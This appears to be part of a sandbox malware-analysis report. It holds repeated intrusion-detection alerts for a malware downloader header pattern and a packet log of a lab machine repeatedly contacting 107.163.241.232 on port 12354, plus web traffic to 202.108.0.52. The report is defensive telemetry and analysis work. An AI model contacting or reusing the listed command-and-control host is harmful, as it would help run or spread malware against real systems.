2024-12-11T16:30:14.742552+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61570	107.163.241.232	12354	TCP
2024-12-11T16:30:16.496188+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63612	107.163.241.232	12354	TCP
2024-12-11T16:30:16.496227+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63505	107.163.241.232	12354	TCP
2024-12-11T16:30:18.739972+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65323	107.163.241.232	12354	TCP
2024-12-11T16:30:18.865408+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65389	107.163.241.232	12354	TCP
2024-12-11T16:30:20.508297+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50975	107.163.241.232	12354	TCP
2024-12-11T16:30:20.508329+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50829	107.163.241.232	12354	TCP
2024-12-11T16:30:22.746542+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52158	107.163.241.232	12354	TCP
2024-12-11T16:30:22.884825+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52198	107.163.241.232	12354	TCP
2024-12-11T16:30:24.761095+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53724	107.163.241.232	12354	TCP
2024-12-11T16:30:24.761216+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53837	107.163.241.232	12354	TCP
2024-12-11T16:30:27.035376+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54347	107.163.241.232	12354	TCP
2024-12-11T16:30:27.224335+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54354	107.163.241.232	12354	TCP
2024-12-11T16:30:28.816773+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56201	107.163.241.232	12354	TCP
2024-12-11T16:30:28.816908+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56039	107.163.241.232	12354	TCP
2024-12-11T16:30:31.115604+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56252	107.163.241.232	12354	TCP
2024-12-11T16:30:31.287859+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56254	107.163.241.232	12354	TCP
2024-12-11T16:30:33.039389+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58090	107.163.241.232	12354	TCP
2024-12-11T16:30:33.039416+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58073	107.163.241.232	12354	TCP
2024-12-11T16:30:35.287287+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58146	107.163.241.232	12354	TCP
2024-12-11T16:30:35.459632+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58153	107.163.241.232	12354	TCP
2024-12-11T16:30:37.179448+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59396	107.163.241.232	12354	TCP
2024-12-11T16:30:37.179512+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59400	107.163.241.232	12354	TCP
2024-12-11T16:30:39.430246+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59732	107.163.241.232	12354	TCP
2024-12-11T16:30:39.521702+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59839	107.163.241.232	12354	TCP
2024-12-11T16:30:42.022482+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61066	107.163.241.232	12354	TCP
2024-12-11T16:30:42.423645+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61081	107.163.241.232	12354	TCP
2024-12-11T16:30:43.944861+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	62888	107.163.241.232	12354	TCP
2024-12-11T16:30:43.944873+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	62665	107.163.241.232	12354	TCP
2024-12-11T16:30:46.178271+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63787	107.163.241.232	12354	TCP
2024-12-11T16:30:46.287300+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63901	107.163.241.232	12354	TCP
2024-12-11T16:30:47.959947+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49512	107.163.241.232	12354	TCP
2024-12-11T16:30:47.959978+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49405	107.163.241.232	12354	TCP
2024-12-11T16:30:50.318159+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51248	107.163.241.232	12354	TCP
2024-12-11T16:30:50.318383+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51247	107.163.241.232	12354	TCP
2024-12-11T16:30:52.084901+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53356	107.163.241.232	12354	TCP
2024-12-11T16:30:52.084953+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53222	107.163.241.232	12354	TCP
2024-12-11T16:30:54.321134+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54771	107.163.241.232	12354	TCP
2024-12-11T16:30:54.430169+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54925	107.163.241.232	12354	TCP
2024-12-11T16:30:56.168398+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56879	107.163.241.232	12354	TCP
2024-12-11T16:30:56.168425+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56860	107.163.241.232	12354	TCP
2024-12-11T16:30:58.491193+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57630	107.163.241.232	12354	TCP
2024-12-11T16:30:58.803244+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57670	107.163.241.232	12354	TCP
2024-12-11T16:31:00.729701+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58364	107.163.241.232	12354	TCP
2024-12-11T16:31:01.036663+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58692	107.163.241.232	12354	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 16:27:04.394959927 CET	49734	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.395427942 CET	49735	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.515018940 CET	12354	49734	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:04.515103102 CET	49734	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.515338898 CET	12354	49735	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:04.515392065 CET	49735	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.523082018 CET	49734	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.531306028 CET	49735	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:04.644382954 CET	12354	49734	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:04.651089907 CET	12354	49735	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:05.366077900 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:05.485707998 CET	80	49748	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:05.485852957 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:05.486073971 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:05.605320930 CET	80	49748	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:06.627330065 CET	12354	49734	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.627466917 CET	49734	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.627507925 CET	12354	49735	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.627557039 CET	49735	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.692095041 CET	49734	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.699342966 CET	49757	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.703533888 CET	49735	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.815521955 CET	12354	49734	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.819890022 CET	12354	49757	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.820003986 CET	49757	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.823084116 CET	12354	49735	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.828243971 CET	49757	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.859183073 CET	49760	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.947807074 CET	12354	49757	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.978530884 CET	12354	49760	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:06.978605032 CET	49760	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:06.978789091 CET	49760	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:07.048930883 CET	80	49748	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:07.049103975 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:07.070847034 CET	49764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:07.070878029 CET	443	49764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:07.070996046 CET	49764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:07.100244045 CET	12354	49760	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:07.114979982 CET	49764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:07.115003109 CET	443	49764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:08.382770061 CET	49757	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.382833004 CET	49760	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.382963896 CET	49764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.390141964 CET	49777	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.509424925 CET	49779	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.509458065 CET	12354	49777	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:08.509540081 CET	49777	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.509687901 CET	49777	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.524883032 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.525145054 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.628788948 CET	12354	49779	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:08.628916979 CET	12354	49777	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:08.628921986 CET	49779	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.629601955 CET	49779	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:08.644543886 CET	80	49748	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:08.644608021 CET	80	49780	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:08.644654989 CET	49748	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.644691944 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.644906044 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:08.749181986 CET	12354	49779	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:08.764308929 CET	80	49780	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:10.303637028 CET	80	49780	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:10.303700924 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:10.462474108 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:10.462517023 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:10.462627888 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:10.462975025 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:10.462990999 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:10.679872990 CET	12354	49777	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:10.679943085 CET	49777	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.740051031 CET	49777	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.741904974 CET	49796	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.815370083 CET	12354	49779	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:10.815470934 CET	49779	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.815538883 CET	49779	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.859453917 CET	12354	49777	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:10.861696005 CET	12354	49796	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:10.863358021 CET	49796	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.872948885 CET	49796	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.883250952 CET	49799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:10.935064077 CET	12354	49779	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:10.992301941 CET	12354	49796	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:11.002963066 CET	12354	49799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:11.003299952 CET	49799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:11.003299952 CET	49799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:11.122665882 CET	12354	49799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:12.154144049 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.154220104 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.154975891 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.155065060 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.219695091 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.219717026 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.220112085 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.220175982 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.223522902 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.267332077 CET	443	49794	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.408915997 CET	49799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.408981085 CET	49794	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.409220934 CET	49796	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.410571098 CET	49819	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.529880047 CET	12354	49819	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:12.529944897 CET	49819	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.539670944 CET	49819	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.555988073 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.556353092 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.556358099 CET	49821	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.659064054 CET	12354	49819	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:12.675544977 CET	80	49780	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.675681114 CET	49780	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.675700903 CET	80	49822	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.675713062 CET	12354	49821	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:12.675765038 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.676013947 CET	49821	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.702116013 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:12.702569962 CET	49821	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:12.824141979 CET	80	49822	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:12.824157953 CET	12354	49821	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.264381886 CET	80	49822	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:14.264523983 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:14.273288965 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:14.273329020 CET	443	49834	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:14.273386955 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:14.273988008 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:14.273998976 CET	443	49834	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:14.644834995 CET	12354	49819	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.644917965 CET	49819	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.645088911 CET	49819	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.646017075 CET	49838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.764906883 CET	12354	49819	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.765742064 CET	12354	49838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.765842915 CET	49838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.766047001 CET	49838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.800755024 CET	12354	49821	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.800806046 CET	49821	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.800915956 CET	49821	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.801383018 CET	49840	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.885289907 CET	12354	49838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.920300961 CET	12354	49821	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.920655966 CET	12354	49840	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:14.920723915 CET	49840	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:14.925379038 CET	49840	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:15.044874907 CET	12354	49840	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:15.996901035 CET	443	49834	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:15.997313023 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:16.075180054 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:16.075189114 CET	443	49834	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:16.082958937 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:16.082966089 CET	443	49834	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:16.610980988 CET	49838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:16.611004114 CET	49840	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:16.611041069 CET	49834	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.224347115 CET	49853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.344084978 CET	12354	49853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:17.344206095 CET	49853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.417006016 CET	49853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.500006914 CET	49859	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.500653982 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.501061916 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.537487030 CET	12354	49853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:17.620318890 CET	12354	49859	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:17.620439053 CET	49859	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.620645046 CET	49859	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:17.622299910 CET	80	49860	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:17.622317076 CET	80	49822	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:17.622369051 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.622447014 CET	49822	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.622561932 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:17.742486954 CET	12354	49859	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:17.744050980 CET	80	49860	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:19.193589926 CET	80	49860	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:19.193650961 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:19.198693037 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:19.198740959 CET	443	49876	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:19.198834896 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:19.199167013 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:19.199177027 CET	443	49876	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:19.454797029 CET	12354	49853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:19.454941034 CET	49853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:19.464112997 CET	49853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:19.464454889 CET	49879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:19.584317923 CET	12354	49853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:19.584337950 CET	12354	49879	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:19.584532976 CET	49879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:19.607882023 CET	49879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:19.727226973 CET	12354	49879	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:19.739568949 CET	12354	49859	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:19.739713907 CET	49859	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:20.060522079 CET	49859	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:20.060960054 CET	49881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:20.180792093 CET	12354	49859	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:20.180809975 CET	12354	49881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:20.180958986 CET	49881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:20.376434088 CET	49881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:20.496185064 CET	12354	49881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:20.873919964 CET	443	49876	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:20.873971939 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:20.874702930 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:20.874707937 CET	443	49876	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:20.876858950 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:20.876866102 CET	443	49876	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:21.428354025 CET	49879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.428395033 CET	49876	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.428416967 CET	49881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.428865910 CET	49895	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.541737080 CET	49897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.548098087 CET	12354	49895	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:21.548418999 CET	49895	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.548589945 CET	49895	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.560106039 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.560420036 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.661410093 CET	12354	49897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:21.661504030 CET	49897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.661674976 CET	49897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:21.668126106 CET	12354	49895	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:21.679996967 CET	80	49898	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:21.680036068 CET	80	49860	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:21.680121899 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.680171967 CET	49860	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.680483103 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:21.781106949 CET	12354	49897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:21.799885035 CET	80	49898	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:23.244754076 CET	80	49898	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:23.244884014 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:23.661725044 CET	12354	49895	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:23.661801100 CET	49895	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:23.769752026 CET	12354	49897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:23.769865990 CET	49897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.007400036 CET	49895	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.008110046 CET	49917	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.069891930 CET	49897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.074003935 CET	49918	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:24.074038029 CET	443	49918	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:24.074093103 CET	49918	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:24.126780987 CET	12354	49895	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:24.127718925 CET	12354	49917	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:24.127815008 CET	49917	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.173271894 CET	49918	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:24.173295021 CET	443	49918	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:24.174278975 CET	49917	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.189214945 CET	12354	49897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:24.293971062 CET	12354	49917	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:24.306051016 CET	49920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.425802946 CET	12354	49920	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:24.425903082 CET	49920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.435442924 CET	49920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:24.558111906 CET	12354	49920	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:25.444014072 CET	49920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.444039106 CET	49918	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:25.444075108 CET	49917	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.445633888 CET	49935	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.565548897 CET	12354	49935	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:25.565637112 CET	49935	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.565784931 CET	49935	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.602114916 CET	49937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.603569031 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:25.604046106 CET	49938	80	192.168.2.7	202.108.0.52
